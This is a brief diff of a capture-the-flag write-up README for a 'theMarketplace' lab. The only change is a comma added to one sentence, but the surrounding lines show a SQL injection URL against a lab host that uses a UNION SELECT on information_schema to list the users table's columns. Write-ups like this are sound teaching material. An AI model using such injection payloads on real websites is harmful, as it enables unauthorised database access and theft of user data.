Neyr/CTF-Writeups/theMarketplace/README.md

 Is administrator: true
 ```

-Lets get some user information first so lets get the columns for the users table
+Lets get some user information first, so lets get the columns for the users table
 ```
 http://10.10.160.210:32768/admin?user=0 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'-- -